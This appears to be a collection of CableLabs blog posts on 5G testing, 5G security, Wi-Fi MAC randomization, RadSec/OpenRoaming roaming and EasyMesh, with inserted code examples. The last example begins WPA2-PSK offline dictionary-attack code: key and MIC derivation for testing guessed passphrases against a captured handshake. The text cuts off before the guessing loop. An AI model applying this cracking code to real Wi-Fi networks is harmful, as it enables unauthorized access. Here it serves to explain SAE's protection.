NTIA Announces the Full Roster of 5G Challenge Contestants
CableLabs congratulates Capgemini Engineering, Fujitsu Network Communications, Mavenir Systems Inc., Radisys Corporation and Signal System Management for being selected as contestants in the National Telecommunications and Information Administration’s Institute for Telecommunication Sciences (NTIA-ITS) 5G Challenge. The competition is hosted by CableLabs. Including Rakuten, the early bird contestant, this group of six participants highlights the diversity of vendors working to develop open and interoperable networks for 5G and beyond.
Collectively, the contestants will bring nine subsystems to be tested. The contestants range from well-established telecom vendors to newer entrants in the emerging Open Radio Access Network (O-RAN) ecosystem. The 5G Challenge prize competition aims to accelerate the adoption of open interfaces, interoperable components and multi-vendor solutions toward the development of an open 5G ecosystem.
Cutting-Edge Lab Capabilities
Over the past few months, CableLabs’ expert technical team prepared its state-of-the-art 5G Lab by adding new capabilities to test contestants’ O-RAN subsystems. These include Viavi’s TeraVM and TM500 systems for wrap-around testing of each O-RAN subsystem, the Centralized Unit (CU), Distributed Unit (DU) and Radio Unit (RU), and one of the industry’s first Open Distributed Unit (O-DU) testers. CableLabs and Kyrio staff are finalizing work to ensure that participants can reliably and securely test their subsystems’ support for industry specifications and their interoperability with the other contestants’ subsystems. Multiple CU, DU and RU systems will be tested during the 5G Challenge with the goal of accelerating the development and deployment of O-RAN in the 5G ecosystem.
The test plans for each O-RAN subsystem were developed by CableLabs in conjunction with the NTIA to focus on conformance with the O-RAN Alliance and 3GPP specifications. Each system will be tested for integration, interface conformance, functionality and performance. These tests will provide information to the vendors, NTIA-ITS, the Department of Defense and the larger 5G ecosystem about the current status of the O-RAN vendor community, the benefits of interoperability, and the potential for future development of open and interoperable systems for 5G and future wireless networks.
Staff Expertise and Analysis
Contestants and the government will not only benefit from access to the state-of-the-art 5G Lab but also from access to the wireless network expertise of CableLabs and Kyrio staff. Staff will assist each contestant team to ensure complete and accurate testing. As the Host Lab, CableLabs will also provide technical analysis of each test to NTIA-ITS.
We’re looking forward to seeing all the contestants at the 5G Lab this summer and continuing CableLabs’ long-term investment in open and interoperable networks.
Tackling Security Challenges in 5G Networks
Today, 5G mobile networks are being deployed rapidly around the globe. According to GSMA Mobile Economy 2021, 5G mobile connections in North America accounted for 3 percent of all mobile connections in 2020, but that number is expected to climb to 51 percent by 2025.
On top of the accelerated deployment of public 5G networks, private 5G networks based on unlicensed spectrum and open 5G solutions supporting open interfaces and interoperability are also emerging. It’s anticipated that 5G networks—both public and private—will become predominant in the near future.
From a security perspective, 5G networks introduce both new security enhancements and new security challenges. In particular, the move of 5G core networks to service-based and virtualized architectures creates new challenges, because the core’s network functions now run as software on a shared cloud platform whose own security the 5G standards do not cover. How to securely deploy 5G networks to protect both subscribers and 5G network infrastructure is a top concern for both executives and practitioners using and managing 5G technologies.
Filling the Gap in 5G Security Standards
The good news is that the National Cybersecurity Center of Excellence (NCCoE), part of the National Institute of Standards and Technology (NIST), is developing 5G cybersecurity guidance to help organizations effectively mitigate 5G-related security risks. In particular, the NCCoE seeks to address the gap in current 5G cybersecurity standards development, which primarily focuses on the security of the interfaces between 5G components. These standards don’t specify the cybersecurity protections for the underlying IT components that support and operate the 5G system.
CableLabs, along with our fellow collaborators, worked with the NCCoE on developing a 5G cybersecurity practice guide and a secure 5G reference architecture to mitigate 5G cybersecurity risks. We considered both 5G standards-based security features and a secure cloud-based hosting IT infrastructure.
The guide provides recommendations related to implementing a secure cloud environment for hosting 5G core networks—for example, by leveraging server hardware root of trust to enable remote attestation of the trustworthiness of cloud computing platforms. To date, 3GPP SA3 has yet to complete its study of security impacts resulting from the virtualization of the 5G core. Therefore, the NCCoE’s guidance and recommendations for securing the 5G cloud platform will help fill the gap in current 5G security standards and help inform 3GPP’s work in this area.
Share Your 5G Expertise
Finding Solutions to Randomized Wi-Fi MAC Addresses
As Wi-Fi device and OS vendors implement Randomized and Changing MAC Address (RCM) to reduce or eliminate the ability to track users and their devices, the functional costs of RCM for the Wi-Fi industry are emerging. This blog discusses how the industry is enhancing users’ privacy while working to maintain legitimate functions that require a stable means of device identification. It wraps up by discussing the effects of RCM on beneficial tools and the industry efforts to address those impacts through innovation and new technology development.
Functionality Impacts of Wi-Fi MAC Randomization
As privacy has become an increasing priority, addressing unwanted tracking of individuals and devices has become central to enhanced privacy efforts. Device and OS vendors have started to implement RCM to negate this tracking risk for consumers. This shift was previously discussed in an earlier CableLabs blog post titled “MAC Address Randomization: How User Privacy Impacts Wi-Fi And Internet Service Providers.”
When a device is on a Wi-Fi network, its MAC address is carried in the clear in the header of every 802.11 frame it sends or receives, even on encrypted networks. Anyone with a Wi-Fi sniffer can therefore read a device’s MAC address and, by observing where and when that address appears (e.g., entering and leaving an area), associate the device with its user. Once that correlation has been made, the same MAC address can be used to track the user at future locations. RCM breaks the correlation by presenting a different random MAC address over time, so the same address isn’t seen repeatedly.
RCM implementations differ by device and OS vendor in when a new random address is generated: per Wi-Fi session, after a period of time or per associated SSID (network name), to name a few. Although RCM can reduce and potentially eliminate a third party’s ability to track a user, the capability comes at a cost. RCM impairs legitimate functions, features and services that rely on a static, non-randomized MAC address to identify a device. Examples of functions hindered by RCM include captive portal authorization, parental controls, allow/deny access lists and lawful intercept.
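To make the mechanism concrete, here is an added example (not part of the original post, and not CableLabs code). Current RCM implementations mark a randomized address by setting the locally administered bit (0x02) in the first octet of the MAC, so a network that keys features on the MAC address can at least tell which clients are presenting random addresses. The code classifies addresses by that bit and runs the check over a few constructed association-log lines against a constructed allow list; the log format, the MAC values and the allow list are assumptions for the example.

```python
import re
from collections import Counter

# Constructed association-log lines (assumptions for the example, not real captures):
# timestamp, event, client MAC, SSID.
SAMPLE_LOG = """\
2021-06-01T08:00:01 assoc 3c:22:fb:1a:2b:3c Home
2021-06-01T08:00:05 assoc 7a:91:3e:55:aa:01 Home
2021-06-01T12:30:10 assoc 3c:22:fb:1a:2b:3c Home
2021-06-02T09:15:22 assoc 46:08:d1:9f:00:7e Home
2021-06-02T09:16:00 assoc 01:00:5e:00:00:fb Home
"""

_MAC_RE = re.compile(r"^[0-9a-f]{2}(?:[:-][0-9a-f]{2}){5}$", re.I)


def parse_mac(text):
    """Return the six octets of a MAC address as bytes; reject anything else."""
    m = text.strip().lower()
    if not _MAC_RE.match(m):
        raise ValueError(f"not a MAC address: {text!r}")
    return bytes(int(octet, 16) for octet in re.split(r"[:-]", m))


def classify_mac(text):
    """Classify by the I/G and U/L bits of the first octet (IEEE 802 address format).

    bit 0 (0x01) individual/group: set on multicast addresses, which are never clients
    bit 1 (0x02) universal/local:  set on locally administered addresses, which is how
                                   RCM implementations mark a randomized MAC
    """
    first = parse_mac(text)[0]
    if first & 0x01:
        return "multicast"
    if first & 0x02:
        return "randomized"  # no OUI to look up; the address may change at any time
    return "global"          # burned-in, OUI-assigned address


def audit_allow_list(log_text, allow_list):
    """Count client classes in the log and list randomized MACs an allow list would deny.

    A device enrolled under one random MAC shows up as unknown once it rotates, so these
    denials are the RCM breakage the post describes, not necessarily intruders.
    """
    allowed = {parse_mac(a) for a in allow_list}
    counts = Counter()
    denied_randomized = []
    for line in log_text.splitlines():
        _ts, event, mac, _ssid = line.split()
        if event != "assoc":
            continue
        kind = classify_mac(mac)
        counts[kind] += 1
        if kind == "randomized" and parse_mac(mac) not in allowed:
            denied_randomized.append(mac)
    return dict(counts), denied_randomized


if __name__ == "__main__":
    print(audit_allow_list(SAMPLE_LOG, ["3c:22:fb:1a:2b:3c"]))
```

The classification only says that an address is locally administered, not which device is behind it; that is exactly the information RCM withholds, which is why the allow list in the example cannot recognize a returning device.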
The Wi-Fi Industry’s Solutions
Because of the impairments to legitimate functions that occur based on RCM, the Wi-Fi industry is working to develop alternative methods of identifying devices without exposing the device identity and creating the risk that a user might be tracked. The first step in this process is identifying use cases in which the device identity needs to be known for legitimate purposes. Several Wi-Fi industry organizations—including Institute of Electrical and Electronics Engineers (IEEE), Internet Engineering Task Force (IETF) and Wireless Broadband Alliance (WBA)—are working on identifying and detailing these use cases.
Although each organization is working independently, each also recognizes that cooperation and information exchange are critical to addressing the issue in a timely and unified manner. CableLabs is leading the effort and actively contributing across several organizations to ensure that consumers are protected while functions important to broadband network operators continue to operate. Through the collective support of a Wi-Fi industry composed of operators, device and OS vendors, and other vendors, innovative solutions are being explored and specified to ensure that a balanced solution emerges.
Some vendors are already considering device-identification solutions that don’t require a static MAC address and allow privacy risks to be mitigated without breaking key functionality. One promising approach, fingerprinting, derives a unique device signature from radio-frequency and traffic characteristics. Similar solutions are being investigated to detect the presence of individual devices where legitimate features require it. However, a device signature that is stable enough to support these features is itself an identifier, so some of these solutions may still allow a third party to identify devices and correlate them to users, re-enabling tracking.
The industry still needs a secure method of identifying devices without hobbling features, functions and services that depend on a static Wi-Fi MAC address while protecting data privacy concerns. To get involved in defining use cases and helping to create the right solution(s), you can join one (or more) of the industry organizations that are addressing RCM.
For more information, please contact Luther Smith (email@example.com).
Bringing Wi-Fi Security to the Next Level
WBA PKI Framework Enables RadSec Connection Security
In 2020, the COVID-19 pandemic nearly eliminated travel. Today, as restrictions are lifted, we’re seeing travel levels increase—particularly locally. Soon, we should all be able to return to the world of far-reaching travel.
Whether for trips across town or journeys around the globe, Wi-Fi access is a critical necessity in the 21st century. Using Wi-Fi roaming technologies such as Passpoint®, Wireless Broadband Alliance (WBA) WRIX and OpenRoaming™, we can enjoy a Wi-Fi connected broadband experience wherever we go. As we move about, many Wi-Fi networks from various operators are available to us; most are protected by some level of security, whether a shared secret, a captive portal or the Extensible Authentication Protocol (EAP) carried over IEEE 802.1X.
Many service providers are moving to EAP for user authentication, a tactic that not only simplifies access to their own Wi-Fi network but also enables a secure roaming experience for their users. To allow users to be authenticated and gain access to roaming Wi-Fi networks, user credentials need to be routed to the home service provider. This interconnection between the roaming partner and the home service provider has typically been over IPSec tunnels. The introduction of RadSec is changing the method of interconnection. RadSec offers a full end-to-end secure path and the ability to use dynamic interconnections.
RadSec interconnection security is based on mutual TLS authentication with X.509 certificates exchanged between the two operators, which authenticates each operator to the other and encrypts the information exchanged. To standardize these certificates and the trust chain behind them, WBA members (under the leadership of CableLabs) undertook the creation of a solid RadSec PKI framework.
The WBA team led by CableLabs is proud to have completed the PKI framework and made it available for deployment and use by all WBA members, marking the closure of the WBA Roaming Evolution Working Group. The PKI framework includes the PKI Certificate Policy (CP), the Trust Root Certificate Authority (CA) agreement, the Policy Intermediary CA (I-CA) agreement, the Issuing I-CA agreement, the End-Entity agreement, Operator Deployment Guidelines and End-Entity Deployment Guidelines.
With the PKI framework complete, Wi-Fi roaming can become simpler. Several roaming implementations will benefit from it, including specific inter-operator roaming deployments, the WBA Wireless Roaming Intermediary eXchange (WRIX) and OpenRoaming.
The WBA PKI framework is currently available to WBA members, and PKI certificates are issued by Kyrio®, a wholly owned subsidiary of CableLabs. Moving forward, the WBA Roaming Work Group will continue to manage the PKI framework and its documentation, including the new project, “Profiles & RCOIs Prioritization”.
IWiNS—An Informed Approach to Mobile Traffic Steering
It’s 3 p.m. and you’re rushing, in between meetings, to pick up your kids from school. You start to pull out of your garage when your boss texts you to hop on a quick video call. But something doesn’t work. Your app seems stuck, showing a spinning wheel, and you really need to get going. You’re starting to get nervous. You shake your fist at the sky and shout, “The Wi-Fi!”
That’s right: You’re far enough away from your home Wi-Fi access point that you have very little connectivity available, but you’re still close enough that your phone won’t let go of that connection. It happens all the time—like the last time you were in that coffee shop, browsing the web just fine, but then you suddenly had issues joining a video call. Or when you were walking your dog around the neighborhood while playing your favorite game, and the session kept freezing and crashing.
So, what do you do when you’re paused in your driveway, eager to get on the road? You rush through your phone settings, turn off Wi-Fi, your cellular connection kicks in and now you can finally start the video call with your boss. Your intuition saved the day—this time!
The good news is that there’s likely nothing wrong with your home Wi-Fi or your phone and that you aren’t alone in this experience. In fact, CableLabs’ primary research shows that whenever mobile customers perceive a poor quality of experience, 64 percent of them feel the need to manually troubleshoot their network connectivity—and they believe the quickest and most effective solution is to turn off Wi-Fi and rely solely on the cellular network. Unfortunately, this behavior causes operators direct and indirect losses, and it prevents users from leveraging operator Wi-Fi networks that could serve them better and potentially give them a better mobile user experience.
We live in a constantly connected world in which users often have overlapping Wi-Fi, LTE and Citizens Broadband Radio Service (CBRS) coverage. Manually troubleshooting network connectivity frustrates users who don’t want to be concerned about where their data is coming from. How can operators improve the customer experience while maintaining control over how network resources are utilized?
A 2018 PWC Consumer Intelligence Series 5G Survey shows that “roughly one-third [of broadband customers surveyed] said that reliability was a ‘must-have’ for internet access” and that “performance drops were a stronger concern than any other factor, though security, speed and cost efficiency each came up as important.”
As part of our commitment to 10G, CableLabs has been working tirelessly to develop new technologies that help improve latency, security, speed and reliability for broadband customers around the globe. With the importance of reliability to the end-consumer in mind, improvements to connection reliability both in the home and in the mobile space have become one of the top objectives of the 10G platform.
In 2018, CableLabs started researching technologies to improve reliability within the mobile user experience. We analyzed several standard and proprietary solutions, and we identified gaps representing great innovation opportunities. That was the inception of the Intelligent Wireless Network Steering (IWiNS) project, a mobile traffic steering technology created by CableLabs. IWiNS enhances the mobile user experience by adding network and application awareness to traditional mobile traffic steering without requiring any changes to the mobile device or the network infrastructure.
Previous and current mobile steering solutions are divided into two main categories: network-centric and user-centric solutions:
- Network-centric solutions such as LTE-WLAN Aggregation (LWA), LTE-WLAN Radio Level Integration with IPsec Tunnel (LWIP) and 5G Access Traffic Steering, Switching and Splitting (ATSSS) are generally standardized by 3GPP and are centered on the cellular ecosystem. They treat a secondary external network asset (e.g., a Wi-Fi access point) as subordinate to a cellular base station and core network. These solutions require support inside the mobile device and modifications to Wi-Fi access points.
- User-centric solutions are based on downloadable over-the-top apps that aggregate throughput across all the wireless networks that a device can connect with. Although these solutions don’t require specific support from the device operating system (or modifications to the network infrastructure), they provide little or no control for the operator to manage the configuration of the traffic steering rules.
IWiNS fills the gaps for both types of solutions by building a technology that takes advantage of an over-the-top approach and gives full control of the traffic steering configuration to operators. Operators can now optimize single-user connectivity and take advantage of a crowd-sourced approach, resulting in a more reliable, efficient and adaptive traffic steering solution. It’s like evolving from paper maps (static and unilateral information) to the wonders of online navigation, where the power of crowd-sourced information is available.
With IWiNS, operators can generate per-application policies that are optimized using real-time network performance indicators derived from all users connected to the network. Users’ experience is enhanced by freeing them from manually troubleshooting network-connectivity issues, allowing operators to take advantage of a flexible toolset to dynamically manage network resources. Mobile virtual network operators (MVNOs) can cut costs by increasing Wi-Fi offload. Mobile network operators (MNOs) can reduce the capital cost of serving dense demand areas, leveraging cheaper network infrastructure assets and turning multiple networks into one.
IWiNS is deployed by using a client-server architecture in which the client is installed on the mobile device as an over-the-top mobile app and the server is hosted anywhere that’s convenient for the operator (e.g., public cloud, on-premises cloud, private data center). IWiNS doesn’t require any modification to the mobile device operating system or to the network infrastructure. The IWiNS client can also be embedded inside the operator’s customer care app, making its deployment simpler for the operators. The server is composed of containers that handle policy management, network metrics collection and performance estimation functions—all orchestrated to ensure the scalability, efficiency and security of the deployment.
IWiNS optimizes the mobile user experience in real time and also gives operators an effective tool to shape network utilization and control their costs. With IWiNS, a new way of experiencing mobile connectivity is right around the corner.
CableLabs has created and demonstrated the IWiNS 1.0 proof of concept. More information about the IWiNS project, including a white paper, demo and executive summary, is available below.
WBA OpenRoaming™ to Enable Global Wi-Fi Roaming
On May 28, 2020, the Wireless Broadband Alliance (WBA) announced the launch of OpenRoaming. OpenRoaming is a cloud federation-based framework that opens Wi-Fi roaming to a broad community of Identity Providers (IDPs) and Access Network Providers (ANPs). It combines a secured, seamless connection with automatic RADIUS routing in one global multi-provider ecosystem. OpenRoaming builds on multiple technologies: Passpoint, DNS-based discovery, RadSec and components of the Wireless Roaming Intermediary eXchange (WRIX).
OpenRoaming works by using Roaming Consortium Identifiers (RCOIs) to allow Passpoint-driven ANP selection. The RCOIs are identified by two major categories, Settlement Free and Settlement, followed by two sets of subcategories. The subcategories define roaming consortium types and service levels. The roaming consortium types span from general consortiums to industry-specific consortiums. Service levels include none, silver and gold, each defining the level of network Quality of Service (QoS) and the rate of reporting QoS information.
Current roaming platforms select Wi-Fi networks by specific realms, 3GPP network identities or roaming consortiums, and they carry RADIUS traffic over static peer-to-peer interconnections, typically IPSec tunnels. OpenRoaming, shown in Figure 1, lets ANPs support multiple consortiums and couples that with dynamic RadSec interconnections, eliminating the need for static peer-to-peer setup. An additional benefit of RadSec, a RADIUS client/server connection that uses TLS for security, is that it not only eliminates the need for an IPSec peer-to-peer tunnel but also encrypts the RADIUS traffic all the way from RADIUS client to RADIUS server, which secures traffic deeper into the providers’ networks.
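As an added example (not part of the original post, and not WBA or CableLabs code) of what a dynamic RadSec interconnection involves at the DNS level, the following code implements the RFC 7585 dynamic discovery steps an ANP’s RADIUS proxy would take for a roaming user: extract the realm from the NAI (RFC 7542), look for a NAPTR record whose service tag is aaa+auth:radius.tls.tcp, and follow its SRV or host replacement to a RadSec endpoint (default port 2083 per RFC 6614). OpenRoaming’s DNS discovery is assumed here to follow the RFC 7585 mechanism; its profile may add conventions not shown. The zone data is constructed inline rather than queried from live DNS, and the realms and hostnames are assumptions for the example.

```python
import re
from dataclasses import dataclass

RADSEC_SERVICE = "aaa+auth:radius.tls.tcp"  # RFC 7585 NAPTR service tag for RADIUS/TLS
RADSEC_PORT = 2083                          # RFC 6614 default RADIUS/TLS port


@dataclass
class Naptr:
    order: int
    preference: int
    flags: str
    service: str
    replacement: str


@dataclass
class Srv:
    priority: int
    weight: int
    port: int
    target: str


# Constructed zone data standing in for real DNS answers (assumptions for the example).
ZONE_NAPTR = {
    "idp.example": [
        Naptr(10, 10, "S", "x-other:service", "other.idp.example."),  # unrelated, lower order
        Naptr(50, 20, "S", "aaa+auth:radius.dtls.udp", "_radiusdtls._udp.idp.example."),
        Naptr(50, 10, "S", "aaa+auth:radius.tls.tcp", "_radiustls._tcp.idp.example."),
    ],
    "anp.example": [Naptr(10, 10, "A", "aaa+auth:radius.tls.tcp", "radsec.anp.example.")],
    "legacy.example": [],  # realm exists but advertises no dynamic discovery
}
ZONE_SRV = {
    "_radiustls._tcp.idp.example.": [
        Srv(20, 0, 2083, "radsec2.idp.example."),
        Srv(10, 0, 2083, "radsec1.idp.example."),
    ],
}


def realm_of(nai):
    """RFC 7542: the realm is everything after the last '@'; no '@' means a local user."""
    if "@" not in nai:
        return None
    realm = nai.rsplit("@", 1)[1].lower().rstrip(".")
    if not re.fullmatch(r"[a-z0-9-]+(\.[a-z0-9-]+)+", realm):
        raise ValueError(f"malformed realm in {nai!r}")
    return realm


def discover_radsec(realm, naptr_lookup, srv_lookup):
    """RFC 7585 discovery: take the best (lowest order, then preference) NAPTR that
    advertises RADIUS/TLS, then resolve its replacement to a (host, port) endpoint."""
    candidates = [r for r in naptr_lookup(realm) if r.service.lower() == RADSEC_SERVICE]
    if not candidates:
        return None  # no dynamic discovery for this realm: fall back to static routing
    naptr = min(candidates, key=lambda r: (r.order, r.preference))
    flags = naptr.flags.upper()
    if flags == "A":  # replacement is a hostname; the RADIUS/TLS default port applies
        return naptr.replacement.rstrip("."), RADSEC_PORT
    if flags != "S":
        raise ValueError(f"unsupported NAPTR flag {naptr.flags!r}")
    srvs = srv_lookup(naptr.replacement)
    if not srvs:
        return None
    # Lowest priority wins; among equal priorities prefer the higher weight.
    # (RFC 2782 calls for weighted random choice; deterministic here for the example.)
    srv = min(srvs, key=lambda s: (s.priority, -s.weight))
    return srv.target.rstrip("."), srv.port


def route_for(nai):
    """Map a roaming user's NAI to the RadSec endpoint its home realm advertises."""
    realm = realm_of(nai)
    if realm is None:
        return None
    return discover_radsec(realm, lambda r: ZONE_NAPTR.get(r, []), lambda n: ZONE_SRV.get(n, []))


if __name__ == "__main__":
    for nai in ("alice@idp.example", "bob@anp.example", "carol@legacy.example"):
        print(nai, "->", route_for(nai))
```

Discovery only tells the proxy where to connect; whether to trust the answer is decided by the TLS handshake that follows, where the peer’s certificate must chain to the federation’s trusted root and carry a name matching the realm it claims to serve. Unsigned DNS answers are not a trust decision.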
OpenRoaming allows the cable industry to easily establish an inter-roaming partnership across the industry while reducing the overhead of a networking setup. With the defined cable industry-specific RCOI, ANPs can be targeted as part of the cable consortium.
OpenRoaming provides users a seamless Wi-Fi connection beyond the subscriber’s home service area, reducing the need to rely on a cellular data connection. Beyond the operators that provide Wi-Fi services, OpenRoaming is a tool that can be used by Mobile Virtual Network Operators (MVNOs) to assist with Wi-Fi connectivity, enabling cellular data to offload. This would broaden the data offload from a local network to a global network.
New Release of Wi-Fi Certified Vantage™ Continues to Improve the Wi-Fi User Experience
Wi-Fi CERTIFIED Vantage™ is a certification program created within the Wi-Fi Alliance® that makes it easy to select devices that provide an enhanced Wi-Fi experience in managed Wi-Fi networks. The latest release is now available (as of September 2020). This is the culmination of over a year’s worth of collaboration within the Wi-Fi ecosystem under CableLabs’ leadership that delivers feature-rich devices to improve Wi-Fi user experience.
The primary goal of the Wi-Fi Vantage certification program is to provide a more reliable and higher-performance user experience than unmanaged best-effort Wi-Fi networks can provide. The Wi-Fi Vantage certification program designates a highly developed set of Wi-Fi technologies optimized for managed Wi-Fi networks that directly address Wi-Fi managed network operator needs.
Wi-Fi Vantage bundles pertinent Wi-Fi Alliance certifications that improve overall network performance, deliver the latest in Wi-Fi security and encryption standards, and alleviate congestion on mobile data networks. Wi-Fi Vantage delivers a more reliable and consistent connectivity experience for users when they’re establishing network access, onboarding devices, accessing services and traversing Wi-Fi networks.
Wi-Fi Vantage will continue to be available for Wi-Fi 5 generation devices, and Wi-Fi Vantage certification for Wi-Fi 6 will now include advanced features:
- Wi-Fi 6 and Wi-Fi 5
- Wi-Fi CERTIFIED WPA3™
- Wi-Fi CERTIFIED Passpoint®
- Wi-Fi CERTIFIED Enhanced Open™
- Wi-Fi CERTIFIED Agile Multiband™
- Wi-Fi CERTIFIED Optimized Connectivity™
The newest generation, Wi-Fi Vantage Release 3, includes newly developed IEEE 802.11 features and state-of-the-art Wi-Fi technology that can be used in a broader base of operator-managed environments, including public, residential and enterprise. Vantage Release 3 adds the Wi-Fi 6, WPA3 and Enhanced Open certifications, which deliver higher data rates, less congestion, more user capacity and stronger security.
Wi-Fi Vantage will continue to evolve incorporating the latest technologies, giving users the most enhanced Wi-Fi experience available. Each new generation of Wi-Fi Vantage devices will provide improved device performance and reduced network connection times when customers access managed Wi-Fi networks.
As Wi-Fi data usage and user applications continue to grow, those factors introduce strain on the Wi-Fi network that impacts user experience and Wi-Fi network operation. Strains such as maintaining connection, reliable service delivery and spectrum interference/management are some of the common challenges Wi-Fi operators are trying to overcome.
The collective feature set of Wi-Fi Vantage was built to address these strains. For example, the Wi-Fi Vantage features of enhanced network discovery and advanced roaming have been trialed and shown to improve network connection performance, decreasing setup times by 76 percent and reducing management frame and beacon congestion by an average of 70 percent compared with devices that are not Wi-Fi Vantage certified. This is just one example of how Wi-Fi Vantage devices use unique features to overcome Wi-Fi network strains on managed networks.
Wi-Fi CERTIFIED Vantage™ Benefits to Network Operators
- Streamlined product procurement decisions
- Improved network performance and resource management
- Consistent coverage across network
- Ability to influence client roaming behavior
- AP load balancing
- Latest Wi-Fi security and encryption standards
- Quality user experiences
- Data offload
Wi-Fi CERTIFIED Vantage™ Benefits to Users
- Simpler, light or no-touch access
- Secure onboarding
- Faster speeds
- Consistent, reliable coverage
- Seamless transitions from Wi-Fi to cellular
The Wi-Fi Vantage feature set definition is driven by the operator community within the Wi-Fi Alliance that consists of Wi-Fi industry experts who have a pragmatic understanding of operator needs. A dedicated task group, led by CableLabs, was created in the Wi-Fi Alliance to address and develop certifications to meet these needs. CableLabs will continue to work with the Wi-Fi ecosystem to identify common Wi-Fi operator network strains and develop collaborative solutions in the form of standards certification.
Read more about Wi-Fi Vantage, including an animation and WFA overview papers: Wi-Fi CERTIFIED Vantage Enhancing the managed Wi-Fi network experience and Wi-Fi CERTIFIED Vantage™ Technology Overview.
Wi-Fi CERTIFIED EasyMesh™ Update: Added Features for Operator-Managed Home Wi-Fi® Networks
It’s been about a year since Wi-Fi Alliance released the Wi-Fi EasyMesh™ program and started certifying devices. Since then, the industry has been hard at work creating Wi-Fi EasyMesh products and working on what comes next. CableLabs is continuing its leadership work on the updated Wi-Fi EasyMesh certification program, and now we can all see the fruits of that labor.
The updated Wi-Fi EasyMesh protocol adds a number of essential features that operators and end-users need:
- Wi-Fi EasyMesh Controller-centric collection of Wi-Fi CERTIFIED Data Elements™ diagnostic data from all connected access points (APs)
- Enhanced backhaul security with SAE
- Optimized use of available channels with coordinated channel scanning (including DFS channels)
- Network traffic separation with virtual local area networks (VLANs), such as private and guest networks
- Wi-Fi CERTIFIED Agile Multiband™ support for improved client connections
What’s the Big Deal?
Since our last blog post about Wi-Fi EasyMesh, mesh APs have become almost as well known as antibacterial soap or friendship bracelets, albeit not yet as universally deployed. Many of these products work very well, especially those that have dedicated interconnection (backhaul) radios, as Wi-Fi® remains the easiest and most cost-effective way to connect these multi-AP systems.
So, what’s the problem we’re solving with this Wi-Fi EasyMesh update? Nearly all of the products not certified for Wi-Fi EasyMesh are opaque to an operator. When problems arise, the operator has little to no information available about what’s going on behind the cable modem gateway, and the customer is left without assistance. The first version of the Wi-Fi EasyMesh protocol created the groundwork for this, whereby the Wi-Fi EasyMesh Controller (usually in the cable modem gateway) can set up and configure the other Wi-Fi EasyMesh APs. Now, the updated Wi-Fi EasyMesh protocol includes all the diagnostics information (aka, Wi-Fi Data Elements™) that an operator might need to get down to the nitty gritty and fix an issue.
Wi-Fi Data Elements, You Say…
In the blog post, “Data Elements and TR-181 – Connect to the PNM Data You Need,” my colleague Josh Redmore explained what Wi-Fi Data Elements are and exactly why operators need them:
“The ultimate iteration of [remote Wi-Fi troubleshooting] is a fully automated proactive network maintenance system, where Wi-Fi issues are resolved before they impact your customer. When Wi-Fi becomes self-healing, customers enjoy seamless access to your services.”
We can safely say that this is the Holy Grail of any operator-deployed Wi-Fi system, and the updated Wi-Fi EasyMesh protocol with Wi-Fi Data Elements support makes that possible in a standardized way.
Figure 1: Example Wi-Fi EasyMesh and Wi-Fi Data Elements Network Topology
But Wait, There’s More…
Remember all the major enhancements listed above in the Wi-Fi EasyMesh protocol update? What benefits do those bring?
- SAE support in the backhaul replaces the pre-shared-key handshake between Wi-Fi EasyMesh APs with Simultaneous Authentication of Equals (SAE), the password-authenticated key exchange used by WPA3-Personal. SAE is resistant to offline dictionary attacks: an attacker who captures the handshake cannot test passphrase guesses against the capture, because each guess requires a fresh exchange with a live peer. The update also increases cryptographic strength, disallows outdated legacy protocols and requires the use of Protected Management Frames (PMF).
- Coordinated channel scanning is a combination of two features that essentially allow the Wi-Fi EasyMesh Controller to get a complete picture of which Wi-Fi channels are overcrowded and which are free for use. It includes the ability to ask APs to scan specific channels, including DFS channels. The result is that the Wi-Fi EasyMesh network will be able to use the best channels available for each deployment—not only as first installed, but continually.
- Network traffic separation continues Wi-Fi EasyMesh’s support for multiple service set identifiers (SSIDs) per AP and even per radio. However, until now, all traffic for those SSIDs was intermingled. Now each SSID’s traffic can be separated into VLANs. This upgrade helps operators take a step in the right direction toward traffic security.
- Wi-Fi Agile Multiband™ support adds a number of features, including optional support for Fast Transition roaming with WPA2-PSK, improved guidance for clients to move to another AP in the network, tunneling of certain client-sent management frames (ANQP, WNM, Assoc) back to the Wi-Fi EasyMesh Controller, and support for association-disallowed attributes in beacons and probe responses from Wi-Fi EasyMesh Agents.
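Because the SAE bullet above rests on the claim that SAE resists offline dictionary attacks, here is an added example (not part of the original post, and not Wi-Fi Alliance or CableLabs code) of the attack that WPA2-PSK allows and SAE closes. It reconstructs the WPA2-PSK key derivation from IEEE 802.11i (PBKDF2 to the PMK, PRF-384 to the PTK, HMAC-SHA1 over the EAPOL-Key frame for the MIC) and then tests a word list against a constructed copy of the values a sniffer would read from one captured 4-way handshake: the two MAC addresses, both nonces and message 2 with its MIC. The SSID, passphrase, addresses, nonces, frame bytes and word list are all constructed for the example.

```python
import hashlib
import hmac

# Everything below is constructed for the example: SSID, MACs and the two nonces an
# observer reads from a captured 4-way handshake, plus the word list to test.
SSID = b"Home"
AP_MAC = bytes.fromhex("3c22fb1a2b3c")
STA_MAC = bytes.fromhex("7a913e55aa01")
ANONCE = bytes(range(0x10, 0x30))  # 32 bytes
SNONCE = bytes(range(0x40, 0x60))  # 32 bytes


def wpa2_pmk(passphrase, ssid):
    """IEEE 802.11i PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid, 4096, 32)


def prf_384(key, label, data):
    """IEEE 802.11 PRF-384: HMAC-SHA1(key, label || 0x00 || data || counter) for counter 0, 1, 2."""
    out = b"".join(
        hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(3)
    )
    return out[:48]


def wpa2_kck(pmk, ap_mac, sta_mac, anonce, snonce):
    """PTK = PRF-384(PMK, "Pairwise key expansion", min(AA,SPA)||max(AA,SPA)||min(nonces)||max(nonces)).
    Its first 16 bytes are the KCK, the key that authenticates EAPOL-Key frames."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf_384(pmk, b"Pairwise key expansion", data)[:16]


def eapol_mic(kck, frame_with_mic_zeroed):
    """WPA2 (EAPOL-Key descriptor version 2): MIC = HMAC-SHA1(KCK, frame)[:16]."""
    return hmac.new(kck, frame_with_mic_zeroed, hashlib.sha1).digest()[:16]


def message2_frame():
    """Constructed EAPOL-Key message 2 (supplicant -> AP) with the MIC field zeroed:
    EAPOL header, RSN descriptor type, key info 0x010a (version 2, pairwise, MIC), key length,
    replay counter, SNonce, IV, RSC, ID, 16-byte MIC field, empty key data."""
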